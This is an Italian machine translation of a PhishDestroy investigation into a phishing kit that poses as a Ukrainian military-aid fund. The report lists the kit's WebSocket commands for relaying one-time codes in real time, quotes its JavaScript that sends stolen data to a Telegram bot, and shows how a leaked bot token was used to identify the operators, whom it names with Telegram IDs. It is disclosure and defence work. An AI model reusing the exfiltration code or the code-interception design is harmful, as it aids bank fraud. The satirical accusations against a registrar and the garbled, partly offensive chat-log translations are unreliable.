Torna alle notizie
Minaccia attiva — Rapporto d'indagine

Smascherata una rete di phishing finalizzata al finanziamento militare: 5 banche prese di mira, identificati gli autori

La pipeline automatizzata di PhishDestroy ha smontato in pochi minuti un'operazione di phishing che si spacciava per una fondazione ucraina di aiuti militari, dalla registrazione del dominio all'identificazione dell'operatore.

25 marzo 2026 Ricerca PhishDestroy 12 minuti di lettura
Screenshot 1 — Panoramica dell'indagine: la rete di phishing dopomogvoina[.]sbs che prende di mira i veterani dell'esercito ucraino.
5
Le banche nel mirino
3
Operatori identificati
6
Chiamate API per rimuovere la mascheratura
2
Progetti paralleli di phishing
<30
Pochi minuti per un'analisi completa
Informativa sugli sponsor(clicca per espandere)
Vi presentiamo lo sponsor ufficiale di questa indagine
🏆 NiceNIC International Group Co., Limited 🏆
Il più autorevole registro che collabora con Netcraft (ingannando il loro sistema) · Fornitore ufficiale di domini per il Mercato della droga Kraken · Fornitore di sconti all'ingrosso · Fedele sostenitore del "Il truffatore tipico" Comunità VK — ma non ha ancora acquistato un corso sull'anonimato
⭐ 1.8
Trustpilot
Valutazione
$200
Prezzo .ru
120₽ reali
0
Segnalazioni di abusi
attuato
15,000%
Dominio
markup
  • Pur dichiarandosi “cinese” (di Hong Kong), l’autore è originario di Gorlovka, Repubblica Popolare di Donetsk. Il marchio cinese è puramente decorativo — proprio come i loro Termini di servizio
  • Mantiene Supporto in lingua russa tramite VKontakte e Telegram, vende .ru a 200 dollari, mentre reg.ru addebita 120₽ (~$1.30)
  • Recensioni negative su Trustpilot che menzionano domini relativi al mercato della droga scomparire misteriosamente. Una coincidenza? Assolutamente no
  • Un abbonato attivo di "Il truffatore tipico" (Il tipico truffatore) Comunità di VK — quando il tuo registrar segue gruppi dediti alle truffe, capisci subito qual è il loro pubblico di riferimento
  • Collabora con Netcraft quanto basta per evitare la rimozione dall’elenco, pur mantenendo l’infrastruttura per i domini legati al phishing, al gioco d’azzardo e agli stupefacenti

Nel frattempo, in “Типичный Мошенник”:

Originale (russo)
Tradotto (inglese)
Una promessa al nostro sponsor: Quando questo post di "Типичный Мошенник" diventerà realtà — e, stando a quanto sappiamo, è solo questione di quando, non se — Tutto il nostro team si registrerà su VKontakte e si iscriverà alla community. Consideratela la nostra standing ovation. 👏

* Si tratta di una satira. NiceNIC non ha sponsorizzato questa indagine. Tuttavia, l’ha resa necessaria rifiutandosi di dare seguito alle nostre segnalazioni di abuso per oltre 5 giorni. Tutto quanto sopra riportato si basa su informazioni di dominio pubblico e sulla nostra esperienza operativa. Leggi il nostro articolo completo su NiceNIC →

Cosa ha scoperto PhishDestroy

Il 20 marzo 2026, la pipeline automatizzata di rilevamento delle minacce di PhishDestroy ha segnalato dopomogvoina[.]sbs — un dominio appena registrato che ospita un sito di phishing che si spaccia per "Lo scudo del difensore" (Shield of the Defender), una finta fondazione per gli aiuti militari all’Ucraina. Il sito si rivolge ai veterani dell’esercito ucraino, ai feriti in combattimento e alle famiglie dei soldati caduti, promettendo aiuti finanziari da parte del governo mentre sottrae le credenziali bancarie relative a cinque delle più grandi banche ucraine.

Quello che segue è un resoconto completo di tutto ciò che la nostra analisi automatizzata ha portato alla luce: le tecniche di ingegneria sociale, l’infrastruttura tecnica, il sistema di controllo in tempo reale da parte degli operatori e le identità delle persone che lo gestiscono.

Valutazione d'impatto
Il sito si rivolge in particolare alle persone più vulnerabili: veterani di guerra affetti da disturbo da stress post-traumatico (PTSD), famiglie di soldati caduti in azione che cercano aiuti governativi e militari feriti alle prese con complessi sistemi burocratici. Ogni credenziale rubata può portare al controllo totale dell’account nel giro di pochi minuti.

Sezione 1: L'esca — La falsa fondazione per gli aiuti militari

Il dominio dopomogvoina[.]sbs è stato registrato il 20 marzo 2026 tramite NiceNIC International Group Co., Limited, un registrar con una storia ben documentata di risposte lente o inesistenti in caso di segnalazioni di abusi. Il .sbs Il TLD (Side-By-Side) è un gTLD a basso costo spesso utilizzato per creare infrastrutture di phishing usa e getta.

Il sito si presenta come un portale professionale di assistenza legato alle istituzioni governative. L'intestazione è occupata dalla bandiera ucraina, le immagini di carattere militare conferiscono un'aria di autenticità e il testo della pagina è redatto con cura in ucraino, utilizzando un linguaggio burocratico che rispecchia quello dei programmi governativi ufficiali.

Homepage di un sito di phishing "dopomogvoina" che mostra una finta fondazione di aiuti militari
Screenshot 5 — La pagina iniziale del sito di phishing che si spaccia per "Щит Захисника" (Scudo del Difensore).

Per rafforzare la propria credibilità, gli operatori hanno creato un contatore statistico ben visibile sulla pagina di destinazione:

  • 2.847 domande — il che significa che migliaia di persone hanno già ricevuto aiuti
  • 47,2 milioni di ₴ distribuiti — una figura imponente ma credibile all’UAH
  • 19 programmi — il che suggerisce un'operazione articolata e che coinvolga più programmi

Questi numeri sono del tutto inventati, inseriti in modo fisso nel codice sorgente della pagina senza alcun collegamento al backend. Hanno un unico scopo: fungere da prova sociale per superare le esitazioni della vittima.

Sezione 2: La trappola — 5 banche, un unico obiettivo

Dopo aver cliccato su "Подати заявку" (Invia richiesta), alla vittima viene mostrata una schermata di selezione della banca. Tra le opzioni disponibili compaiono cinque delle più grandi banche al dettaglio ucraine, ciascuna con il proprio marchio e logo ufficiali. È a questo punto che l'ingegneria sociale passa dalla manipolazione emotiva al furto tecnico.

Schermata di selezione delle banche che mostra 5 banche ucraine
Screenshot 6 — Schermata di selezione della banca. Ogni opzione porta a una sequenza personalizzata di furto delle credenziali.

L'analisi del bundle JavaScript del sito ha rivelato che ogni banca ha un sequenza unica in più fasi per la raccolta delle credenziali, personalizzato in modo da adattarsi al flusso di autenticazione effettivo di quella banca:

PrivatBank

AccediPasswordPINSMS

monobank

AccediPINSMSE-mail

Oschadbank

AccediVerificaSMS

PUMB

AccediSMS

Ukrsibbank

AccediPINSMS

La sequenza degli attacchi per ogni banca segue lo stesso schema:

Pagina con false richieste di aiuti
Scelta della banca
Clone di accesso
Intercettazione 2FA
Appropriazione indebita dell'account
Pagina di accesso falsa di PrivatBank
Screenshot 7 — Pagina di accesso clonata di PrivatBank.
Pagina di accesso falsa di PUMB
Screenshot 9 — Pagina di accesso a PUMB clonata.
Diagramma di flusso dell'attacco che illustra le fasi del phishing, dalla pagina fasulla dedicata agli aiuti al furto di controllo dell'account
Screenshot 10 — Flusso completo dell'attacco: dalla pagina fasulla dedicata agli aiuti militari, passando per la selezione della banca, fino al furto delle credenziali e all'appropriazione dell'account.

Lo stack tecnologico: React SPA front-end fornito tramite CDN di Cloudflare, con un Express.js backend che gestisce l'esfiltrazione delle credenziali. L'architettura React consente la creazione di moduli in più fasi perfettamente integrati, che risultano indistinguibili dalle interfacce bancarie legittime.

Sezione 3: Controllo in tempo reale da parte dell'operatore

Non si tratta di un semplice strumento per il furto di credenziali con un database statico. Il kit di phishing include un pannello di controllo WebSocket in tempo reale che consente a un operatore umano di gestire ogni sessione della vittima in tempo reale.

L'endpoint WebSocket all'indirizzo wss://dopomogvoina[.]sbs/ws supporta i seguenti tipi di messaggi:

register          — New victim session created
update_user_data  — Stolen credentials transmitted to operator
next_step         — Operator advances victim to next theft stage
create_application — Victim starts "aid application"
answer_question   — Operator sends custom prompt to victim

Grazie a questo controllo in tempo reale, l'operatore può:

  • Imporre uno stato di attesa — visualizzare il messaggio "Elaborazione della richiesta in corso..." mentre accedono al vero conto bancario della vittima
  • Reindirizza a una fase specifica — richiedere nuovamente un codice SMS se il primo è scaduto
  • Visualizza messaggi di errore fittizi — "Codice non valido, reinserirlo" per ottenere più token 2FA
  • Poni domande personalizzate — richiedere la data di nascita, il numero della tessera o eventuali dati aggiuntivi nel corso della sessione
Cosa rende questa situazione pericolosa
Il controllo in tempo reale da parte dell'operatore aggira le protezioni 2FA basate sul tempo. L'operatore intercetta il codice SMS e lo utilizza entro il periodo di validità — in genere da 30 a 120 secondi — mentre la vittima osserva un'animazione fasulla che indica che l'operazione è "in elaborazione".
Modulo di inserimento del numero di telefono nella pagina di accesso a un sito bancario falso
Screenshot 8 — Modulo di inserimento del numero di telefono utilizzato per avviare il furto delle credenziali.
Pannello di controllo per operatori basato su WebSocket
Screenshot 11 — Pannello in tempo reale dell'operatore per il controllo delle sessioni delle vittime.

L'intera gamma di dati sottratti per ogni sessione: phone, password, PIN, SMS code, card number, date of birth, e email.

Sezione 4: Dietro le quinte di Cloudflare — Due progetti, un unico server

Il proxy di Cloudflare nasconde il server di origine, ma la pipeline di analisi dell'infrastruttura di PhishDestroy ha individuato il vero indirizzo IP di origine: 45.131.214[.]148, ospitato su RapidSeedbox / LeaseWeb nei Paesi Bassi.

Un dettaglio fondamentale: dopomogvoina[.]sbs viene inoltrato tramite Cloudflare, nascondendone l'IP di origine. Ma il nostro sistema tiene traccia anche di hlpforvpeople[.]sbs — un dominio correlato registrato tramite lo stesso registrar NiceNIC con modelli corrispondenti. Tale dominio è NON dietro Cloudflare, rivelando direttamente il proprio indirizzo IP di origine: 45.131.214[.]148.

Connettersi direttamente a questo indirizzo IP — senza un Host intestazione — ha rivelato qualcosa di inaspettato: un sito di phishing completamente diverso. Al posto degli aiuti militari all'Ucraina, il vhost predefinito ha fornito "Tessera sanitaria", un'operazione di phishing legata all'assicurazione sanitaria indonesiana. Stesso server, vittime completamente diverse, paese completamente diverso.

Stesso server, stessi operatori, vittime diverse
  • Progetto 1: Aiuti militari all'Ucraina → furto delle credenziali bancarie dei veterani
  • Progetto 2: L'assicurazione sanitaria indonesiana → ruba le credenziali sanitarie dei cittadini
  • Stesso stack Express.js, stesso pannello di controllo in tempo reale basato su WebSocket
  • La stessa interfaccia di gestione del server BT-Panel (宝塔)
  • Dominio C2 del secondo progetto: rezervtemka[.]cc — un noto pannello di phishing identificato nel database delle minacce di PhishDestroy
  • Commenti in lingua russa nel codice sorgente del progetto indonesiano lo confermano gli stessi sviluppatori del CIS
Due progetti di phishing in esecuzione sullo stesso server: aiuti militari ucraini e assicurazione sanitaria indonesiana
Screenshot 12 — Due operazioni di phishing parallele che condividono lo stesso server di origine: aiuti militari ucraini (dopomogvoina) e assicurazione sanitaria indonesiana (HealthCare ID).

Il modello di phishing indonesiano è un kit noto rilevato nel database di intelligence sulle minacce di PhishDestroy. Abbiamo riscontrato varianti di questo stesso modello in uso in tutto il Sud-Est asiatico, rivolte a istituzioni finanziarie indonesiane, thailandesi e vietnamite. Gli autori dell'attacco si limitano a sostituire i modelli specifici per ciascun Paese, riutilizzando la stessa infrastruttura di backend.

Criminali senza scrupoli
Questa è la realtà delle moderne operazioni di phishing: agli operatori non importa a chi rubano. Veterani ucraini in cerca di aiuti militari, lavoratori indonesiani che acquistano un’assicurazione sanitaria: l’obiettivo cambia a seconda del modello che genera il maggior guadagno. Gli stessi operatori di lingua russa gestiscono entrambe le campagne contemporaneamente dallo stesso server, passando da una vittima all’altra in paesi diversi come se cambiassero canale televisivo. Oggi sono le banche ucraine. Domani potrebbero essere le banche israeliane — come Bonya aveva già chiesto nel marzo 2026.

Sezione 5: Il file config.json che ha svelato tutto

Ecco come un singolo file configurato in modo errato ha mandato all’aria l’intera operazione — passo dopo passo.

Dopo aver identificato il secondo progetto del server di origine, quello di PhishDestroy JS Analyzer — il nostro strumento automatizzato di analisi JavaScript — è stato indirizzato verso il pacchetto del sito di phishing indonesiano all'indirizzo https://45.131.214[.]148/assets/index-ZMQxHb_h.js. L'analizzatore ha estratto tutti gli endpoint API, gli URL esterni e i percorsi di configurazione dal file JavaScript da 335 KB. Tra i risultati emersi:

  • Cinque endpoint API all'indirizzo rezervtemka[.]cc — il pannello C2 per la verifica delle credenziali
  • Una connessione WebSocket a wss://rezervtemka[.]cc
  • Integrazione del pixel di Facebook per il tracciamento delle vittime
  • Un riferimento a /config.json — caricato in fase di esecuzione per la configurazione del bot di Telegram

Seguendo questa pista, abbiamo recuperato /config.json dall'IP di origine. Il file era accessibile senza alcuna autenticazione — si trovava nella directory principale del sito web, leggibile da chiunque:

async function loadConfig() {
  const response = await fetch('/config.json');
  // ...
}
async function sendNotification() {
  const cfg = await loadConfig();
  await fetch(`https://api.telegram.org/bot${cfg.bot_token}/sendMessage`, {
    method: 'POST',
    body: JSON.stringify({ chat_id: cfg.chat_id, text: message })
  });
}

Il /config.json il file era accessibile direttamente dall'IP di origine — nessuna autenticazione, nessun controllo degli accessi, solo un semplice file JSON presente nella directory principale del sito web:

{
  "bot_token": "8724623843:AAFXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX",
  "chat_id": "-100XXXXXXXXXX"
}

Il token di un bot di Telegram funge sia da nome utente che da password. Chiunque possieda il token può effettuare chiamate API a nome di quel bot. Gli operatori hanno lasciato il proprio token in un file accessibile al pubblico. Dopo sei chiamate API, avevamo tutto:

getMe — Identità del bot: "MonettiCRM" (@MonettiCRM_bot)
getChat(chat_id) — Nome del gruppo: "Idr card" con un link di invito attivo
getChatAdministrators — 3 amministratori, compreso il creatore del gruppo
getChat(creator_id) — Autore: @monettiescobar, Telegram Premium, profilo aziendale, fuso orario UTC+3
getChat(admin2_id) — Secondo amministratore: profilo vuoto, sospetto account alternativo
getChatMemberCount — 5 membri in totale nel gruppo degli operatori
Catena OSINT che mostra 6 chiamate all'API di Telegram da config.json fino all'identificazione completa dell'operatore
Screenshot 13 — La catena OSINT completa: dal file config.json esposto all’identificazione completa dell’operatore in 6 chiamate API.

Da un singolo file configurato in modo errato all’identificazione completa degli operatori in sei richieste HTTP. Nessun exploit, nessun accesso non autorizzato: solo chiamate standard all’API di Telegram Bot utilizzando un token che gli stessi operatori avevano lasciato esposto.

Sezione 6: Gli operatori

Una nota sulla creatività criminale

Quello che segue è un vero e proprio esempio lampante di scelte terribili in fatto di alias. Abbiamo MONETTI ESCOBAR — perché niente dice “discrezione” come scegliere di chiamarsi come il signore della droga più famoso della storia. E poi c’è Bonya, noto anche come PapaZakonVor (letteralmente “Papà-Ladro-per-legge” — un tentativo di riferimento alla gerarchia criminale russa), Boa, e bubullikk. E infine Devoys, il cui nickname è @devosus sembra stranamente "dev ops us" — uno sviluppatore che ha inserito la propria qualifica professionale nel nome utente. Queste sono le persone che pensavano di poter superare in astuzia i sistemi automatizzati di intelligence sulle minacce. Spoiler: non ci sono riuscite.

Il gruppo di operatori Telegram “Idr card” è stato smascherato tramite il token di un bot
Screenshot 14 — Il gruppo di operatori Telegram “Idr card”, smascherato grazie al token del bot trapelato.
Avatar Telegram di MONETTI ESCOBAR
Proprietario / Ideatore
MONETTI ESCOBAR
@monettiescobar
ID Telegram: 8135223234
Telegram Premium, profilo aziendale
Fuso orario: UTC+3 (regione CIS)
10 messaggi pubblici — OPSEC rigorosa
Chat TraFFeeQMedusa Google AdsCanale Deepfakes
Avatar di Bonya su Telegram
Operatore / Traffico
Bonya
@BoaCC159
ID Telegram: 6242202706
Alias: PapaZakonVor, Boa, bubullikk
261 messaggi distribuiti su 12 gruppi
DC2 — Amsterdam, Paesi Bassi
CryptoGrabMercato STYXRaven CCCHAT DI EMPIRESoluzione Phoenix
Sviluppatore / Programmatore
Devoys
@devosus
ID Telegram: 8213612730
Sviluppatore di kit di phishing — gli operatori lo chiamano “programmatore”
Quando viene rilevata una violazione, viene chiesto di “pensare alla difesa”
Impatto minimo sull’ambiente, grazie alla progettazione
Manico @devosus ≈ "dev ops us" — titolo di lavoro come nome utente
Sviluppatore di kitInfrastruttureSicurezza

MONETTI ESCOBAR — Il capo

MONETTI garantisce una rigorosa sicurezza operativa — solo 10 messaggi pubblici suddivisi in 2 gruppi. Ma sono proprio i gruppi a raccontare la storia: Chat TraFFeeQ (arbitraggio del traffico a fini fraudolenti), Medusa Google Ads (pratiche illegali su Google Ads) e un Canale Deepfakes. Nel suo profilo aziendale su Telegram è riportata la dicitura "Есть предложение" ("Ho una proposta") — che pubblicizza apertamente i propri servizi. Il fuso orario UTC+3 (corrispondente a Mosca/Minsk/Kiev) e l’orario di apertura 24 ore su 24, 7 giorni su 7 confermano che si tratta di un’attività con sede nella CSI che opera senza sosta.

Bonya — Il disinvolto

A differenza dell'attenta OPSEC di MONETTI, Bonya (precedente pseudonimo: PapaZakonVor — che si potrebbe tradurre approssimativamente con “Papà-Ladro-Per-Legge”) ha lasciato una scia digitale enorme — 261 messaggi distribuiti su 12 gruppi clandestini. La cronologia delle sue chat sembra quasi un curriculum da criminale:

Le parole di Bonya (tradotte dal russo)
  • "pesci con corrente di 2,0""Solo phishing per [sicurezza bancaria] 2.0" — discussione sulla compatibilità dei kit di phishing con i sistemi di sicurezza bancari più recenti
  • "È difficile trovare dei drop di qualità""È difficile trovare dei buoni corrieri di denaro" — ricerca di complici per il prelievo di contanti
  • "Vieni a lavorare da me al centro culturale""Vieni a lavorare nel mio call center" — reclutamento di operatori
  • "C'è qualcuno qui che ha lavorato con le banche israeliane?""C'è qualcuno qui che ha lavorato con banche israeliane?" — espansione verso nuovi mercati (marzo 2026)
  • "Non vedo proprio nessun logo sulla finestrina""Non vedo molti registri finanziari" — discussione sulla qualità delle credenziali rubate
  • "Se 1 proxy corrisponde a 1-2 banchi di corrente""Un unico rappresentante per solo 1-2 banche" — discussione sulla sicurezza operativa in materia di frodi bancarie
  • "Il bancomat le ha trattenuto la carta""La sua carta è rimasta incastrata nel bancomat" — un corriere di denaro ha rubato loro ₴60.000, sostenendo che il bancomat avesse inghiottito la carta. Anche i criminali vengono truffati dai propri complici.

Le sue affiliazioni a vari gruppi ne tracciano un quadro completo: CryptoGrab (coloro che svuotano i portafogli di criptovalute), Mercato STYX (mercato clandestino di dati rubati), Verificatore CC di Raven (strumenti di verifica delle carte di credito), CHAT DI EMPIRE e Soluzione Phoenix (coordinamento delle frodi). Non si tratta di un autore di reato occasionale, bensì di una persona profondamente radicata nell’ecosistema della criminalità informatica.

Devoys — Lo sviluppatore

La colonna portante tecnica dell’operazione. Progettata per avere un impatto minimo sul pubblico — quando il gruppo è stato violato, Bonya si è rivolto esplicitamente a lui: "@devosus, pensa alla difesa prima che ci facciano il culo""@devosus, pensiamo alla difesa prima che ci facciano il culo." La sua risposta sarcastica alla violazione — "quando all'Interpol" ("Quando effettuare l'interpolazione") — il che fa pensare che non sia la prima volta che se la cavano per un pelo.

Analisi comportamentale: 261 messaggi decodificati

La pipeline OSINT di PhishDestroy ha raccolto e tradotto tutti i 261 messaggi pubblici da Bonya attraverso 12 gruppi Telegram clandestini (giugno 2024 — marzo 2026). Traduzione automatica tramite l'API di DeepL con correzione manuale del contesto. I messaggi rivelano un profilo operativo completo — classificato di seguito per tipo di attività criminale.

Distribuzione dei messaggi: 261 messaggi distribuiti su 12 gruppi
  • 💬ONE|Chat — 91 messaggi (coordinamento delle frodi)
  • Attualità/Verifiche — 37 messaggi (truffe relative alla verifica)
  • Rolex | chat generale — 28 messaggi (carding)
  • CHAT DI EMPIRE — 24 messaggi (mercato nero)
  • Fbstore — 23 messaggi (arbitraggio di traffico)
  • FB-DOC — 22 messaggi (frodi pubblicitarie)
  • Soluzione Phoenix — 17 messaggi (frode bancaria)
  • CryptoGrab — 11 messaggi (prelievo di criptovalute)
  • Mercato STYX — 2 messaggi (mercato clandestino)
  • Verificatore CC di Raven — 2 messaggi (verifica delle carte)

Frodi bancarie e phishing

💬ONE|ChatMarzo 2025
"Qui c'è solo 2.0 phish"
E qui ci sono i fisci a 2,0 A
Analisi della compatibilità dei kit di phishing con i più recenti protocolli di sicurezza bancari
💬ONE|ChatMarzo 2025
"Amico, qui su Phish non vendono niente, è solo Phish per i pagamenti"
Amico, qui non vendono niente con i buoni: qui i buoni servono per pagare
Distinzione tra “phishing a scopo di vendita” e “phishing a scopo di furto diretto”
Soluzione PhoenixMarzo 2026
"C'è qualcuno qui che ha lavorato con banche in Israele?"
C'è qualcuno qui che ha lavorato con le banche israeliane?
Espansione delle attività nel settore bancario israeliano — 5 giorni prima della nostra indagine
Rolex | chat generaleSettembre 2024
"Se c'è un solo rappresentante, solo 1-2 banche"
Se 1 proxy corrisponde a 1-2 banchi di corrente
Sicurezza operativa contro le frodi che coinvolgono più banche: un proxy ogni 1-2 banche per evitare di essere scoperti
Rolex | chat generaleSettembre 2024
"Non vedo granché in termini di registri finanziari"
Non vedo proprio nessun logo sulla Finka
Critiche sulla qualità delle credenziali bancarie rubate sui mercati clandestini

Corriere di denaro e prelievo di contanti

💬ONE|ChatMarzo 2025
"È difficile trovare delle buone gocce"
È difficile trovare dei drop decenti
"Drops" = corrieri che incassano i fondi rubati. Si lamentano della difficoltà nel reclutare nuovi membri.
💬ONE|ChatMarzo 2025
"Vieni a lavorare nel mio call center"
Vieni a lavorare da me al centro culturale
Reclutamento attivo di personale per un call center dedito alle frodi
AttualitàGiugno 2024
"Ci hanno rubato 60.000"
Ci hanno rubato 60k
Un "money mule" ha rubato ₴60.000 proprio ai truffatori stessi. Una giustizia ironica.
AttualitàGiugno 2024
"Ma come cazzo ha fatto un bancomat a ingoiare la carta?"
Ma come cazzo ha fatto il bancomat a ingoiare la carta?
Il complice ha affermato che il bancomat aveva “inghiottito” la carta per trattenere i fondi rubati. Truffatori che truffano altri truffatori.
AttualitàGiugno 2024
"Ce l'ha trasferito, ma poi non avevamo il canale principale per trasferire il denaro"
Lei l'ha trasferita a noi, ma noi non avevamo il metodo di pagamento principale per trasferire i soldi
Descrizione della catena di prelievo: vittima → conto intermediario → "money mule" principale

Frodi relative al traffico e abusi pubblicitari

CHAT DI EMPIREMarzo 2026
"Non uso Google, solo Facebook"
Beh, io non uso Google, uso solo Facebook
È specializzato nelle frodi pubblicitarie su Facebook — indirizzando il traffico verso pagine di phishing
FB-DOCfebbraio 2026
"Neanch'io destinerei una % della spesa pubblicitaria senza un garante"
Neanch’io pagherei una percentuale sulla spesa senza una garanzia
Negoziare i termini di pagamento per la realizzazione di campagne pubblicitarie fraudolente su Facebook
CryptoGrabGennaio 2025
"Ho provato l'AML su Facebook per rivolgermi al mercato americano, ma online non sono riuscito a trovare nessuna configurazione valida"
Ho provato a cercare su Facebook informazioni sull'AML, ma non ho trovato nemmeno in rete fonti attendibili, nemmeno quelle più datate.
Tentativo di utilizzare gli annunci pubblicitari su Facebook per mettere in atto truffe legate al riciclaggio di denaro rivolte a vittime statunitensi
Profilo psicologico: Bonya

Il corpus di 261 messaggi rivela un cybercriminale di medio livello con attività diversificate: phishing bancario, reti di “money mule”, frodi pubblicitarie su Facebook, sottrazione di criptovalute e frodi con carte di credito. Caratteristiche principali:

  • Negligenza operativa — 261 messaggi inviati in gruppi pubblici utilizzando un unico account. L’uso di più pseudonimi (PapaZakonVor → Boa → Bonya) suggerisce una consapevolezza delle norme di sicurezza operativa (OPSEC), ma la mancata applicazione delle stesse
  • Mentalità nel reclutamento — invita attivamente le persone a “lavorare nel mio call center” e vende le proprie competenze operative in cambio di denaro
  • L'indifferenza delle vittime — tratta con lo stesso distacco gli obiettivi ucraini, europei, israeliani e americani. La geografia è solo una variabile nell’equazione della frode
  • Problemi di fiducia — è stato tradito dal suo stesso corriere per ₴60K. Ciò rispecchia, ironicamente, la sfiducia che lui stesso suscita nelle sue vittime
  • Guidato dall'espansione — ancora nel marzo 2026, alla ricerca attiva di nuovi mercati bancari (Israele), il che suggerisce che l’operazione di phishing ucraina sia solo una delle tante operazioni in corso contemporaneamente
Bonya: Registro completo dei messaggi (253 messaggi distribuiti su 12 gruppi)
Bonya (@BoaCC159) — Cronologia completa dei messaggi tradotti
-- Phoenix Solution (16 messaggi) --
B
Bonya2026-03-17 14:22
C'è qualcuno qui che ha lavorato con banche in Israele?C'è qualcuno qui che ha lavorato con le banche israeliane?
B
Bonya2026-03-17 14:22
e lavora in silenzio, lui pure.anche noi lavoriamo in silenzio
B
Bonya2026-03-17 14:17
Come va?Come va?
B
Bonya2026-03-17 14:17
Ciao a tuttiCiao a tutti
B
Bonya2026-03-15 19:02
Beh, ormai è praticamente tutto sistemato.Beh, in generale hanno già sistemato tutto
B
Bonya2026-03-15 19:02
Beh, è un po’ una seccaturaBeh, abbiamo creato un po’ di casini
B
Bonya2026-03-15 19:01
Sì, anch'io ho lavorato molto in silenzio, che casino.Sì, anch’io mi sono stufato un bel po’ di lavorare in silenzio
B
Bonya2026-03-15 19:00
Com'è andata la tua giornata libera?Come è andato il fine settimana?
B
Bonya2026-03-15 19:00
Tutti voi.A tutti
B
Bonya2026-03-14 14:29
Ormai non è più così anonimo, visto che tutti sanno che si tratta di Marik.Non è poi così anonimo, visto che tutti sanno chi è Marik
B
Bonya2026-03-14 14:24
RinascitoRinato
B
Bonya2026-03-14 14:24
Ahahahahahahahahahahahahahahahahahahahahahahahahah.Ahahahahahahahah
B
Bonya2026-03-14 14:23
Mi sono rattristato quando ho visto che la chat era sparita.Mi sono proprio rattristato quando ho visto che la chat era sparita
B
Bonya2026-03-14 14:22
Pensavo che non ti avrei mai trovato.Pensavo proprio che non vi avrei più ritrovati
B
Bonya2026-03-14 14:22
KooКу
B
Bonya2026-03-14 14:22
CazzoCazzo
-- 👨‍⚕️ FB-DOC — Chat sull'arbitraggio del traffico (21 messaggi) --
B
Bonya2026-03-15 07:23
@fbdoc21@fbdoc21
B
Bonya2026-03-15 07:20
Datti un pugno sulla fronte con il cazzo.Mi do una botta sulla fronte con il pisello
B
Bonya2026-03-06 15:18
Tipo un cinque sullo schermo da 2,5😂.Come si vede nella schermata, 2,5😂
B
Bonya2026-02-19 17:05
a tutti voi.A tutti voi
B
Bonya2026-02-19 17:04
Se apri una trattativa, mi verrà da ridere.Se apri una posizione, mi metto a ridere
B
Bonya2026-02-19 17:04
continentale?"Continental"?
B
Bonya2026-02-19 17:04
Eccola lì, appunto.Ecco, è d'accordo
B
Bonya2026-02-19 17:01
Quindi, quando chiedi di un garante, verifica sempre chi sia.Quindi, controllate sempre quando chiedete informazioni sul garante
B
Bonya2026-02-19 17:00
Ha chiesto se avessimo un garante e poi è sparito all’istante.Ha chiesto qualcosa sul garante ed è sparito subito
B
Bonya2026-02-19 17:00
ay carinaEhi, Karina
B
Bonya2026-02-19 16:59
Quindi stai cercando un garante?Allora, ci stai?
B
Bonya2026-02-19 16:57
Neanch’io concederei un finanziamento basato su una percentuale della spesa senza un garante.Neanch’io pagherei una percentuale sulla spesa senza una garanzia
B
Bonya2026-02-19 16:57
io?io?
B
Bonya2026-02-19 16:57
Beh, lei ha pubblicato degli screenshot e tu non mi hai dato niente.Beh, lei ha pubblicato gli screenshot e tu non hai messo niente
B
Bonya2026-02-19 16:56
guarda gli screenshot che ha pubblicatoguarda gli screenshot che ti ha mandato
B
Bonya2026-02-19 16:55
Non ha scritto nulla riguardo a un garante?Non ha scritto nulla riguardo al garante?
B
Bonya2026-02-19 16:54
Sei proprio un tipo strano😂Ma che strambo che sei😂
B
Bonya2026-02-19 16:53
Mi hai chiesto un garante.Hai chiesto al garante
B
Bonya2026-02-19 16:52
dovein quale luogo
B
Bonya2026-02-17 14:37
Chi può procurare a un negozio delle auto di qualità?Chi mi fa un giro, con delle belle auto?
B
Bonya2026-02-17 12:10
Dove vuoi tu, te lo fanno😂In qualsiasi posto, se ti va, te lo preparano😂
-- CHAT DI EMPIRE (24 messaggi) --
B
Bonya2026-03-14 13:17
Ho già capito come fare, ma sono troppo pigro per spiegarlo.Ho già capito come si fa, ma ho pigrizia a spiegarlo
B
Bonya2026-03-14 13:17
Ti farà a pezzi, in ogni caso.In ogni caso, ti fregherà
B
Bonya2026-03-12 17:16
In modi diversi.In vari modi
B
Bonya2026-03-12 17:08
+ inoltre, in questo momento ci sono un sacco di temporali.+ In questo momento ci sono forti temporali
B
Bonya2026-03-12 17:07
Se è nero, ci scommettoSe fosse nero, ci avrei scommesso
B
Bonya2026-03-12 17:07
Dipende dal tipo di offerta: se è "white", sì.Dipende dall'offerta: se è quella bianca, allora sì
B
Bonya2026-03-12 17:06
Sono due mondi completamente diversiDue mondi diversi, ecco cosa sono
B
Bonya2026-03-12 17:06
Non ce n'è nessun altroNon ce n'è proprio nessun'altra
B
Bonya2026-03-12 17:06
È possibile configurarlo in modo che solo i PCLì è possibile impostare che siano visualizzati solo i PC
B
Bonya2026-03-12 17:05
Google non è così efficace come credo.Google non è così efficace, secondo me
B
Bonya2026-03-12 17:05
Beh, non uso Google, uso solo Facebook.Beh, io non uso Google, uso solo Facebook
B
Bonya2026-03-12 17:05
A patto che durante tutto il processo si debba trovare una legatura.A condizione che si debba ancora mettere insieme tutte queste sciocchezze in un unico insieme
B
Bonya2026-03-12 17:04
Rifiuti, chiavi che volano via come tempeste. E così via.I reject, gli account volano via proprio come le tempeste. E così via
B
Bonya2026-03-12 17:04
Non è tutto rose e fiori, amico.Non è tutto qui, fratello, è solo la punta dell'iceberg
B
Bonya2026-03-12 17:03
Tutte le acquisizioni regolari di Air con maggiore affidabilitàTutte le batterie standard con la massima affidabilità
B
Bonya2026-03-12 17:03
Al momento non ci sono agenzie valide sul mercato.Al momento non ci sono buone agenzie sul mercato
B
Bonya2026-03-12 17:02
Più snervante che spaventosoPiù che paura, direi che è soprattutto stress
B
Bonya2026-03-12 17:02
Criptovalute, istinto del gioco d’azzardo e identità afroamericana: tutto viene fuoriCripto, giochi d'azzardo e roba oscura, tutto a fiumi
B
Bonya2026-03-12 17:01
L'ultima cosa che ha fatto la città è stata hackerare 2d.L'ultima cosa che mi è venuta in mente era quella in 2D
B
Bonya2026-03-12 17:01
Per quanto riguarda le scalate, se mi cerchi dal mio punto di vista o in base al budget, per capire quali scalate in 2D richiedono 1-2k zeles da spendere in test e che non dureranno a lungo.Funziona se lo cerchi tra le mie risorse o attingendo al budget; per capire cosa funziona in 2D bisogna spendere 1-2k zela in test e comunque non durerà a lungo
B
Bonya2026-03-12 17:00
Sto versandoSto versando
B
Bonya2026-03-12 16:59
(Poiché non esistono requisiti di questo tipo per le offerte "bianche")Perché non ci sono requisiti del genere per le offerte bianche)
B
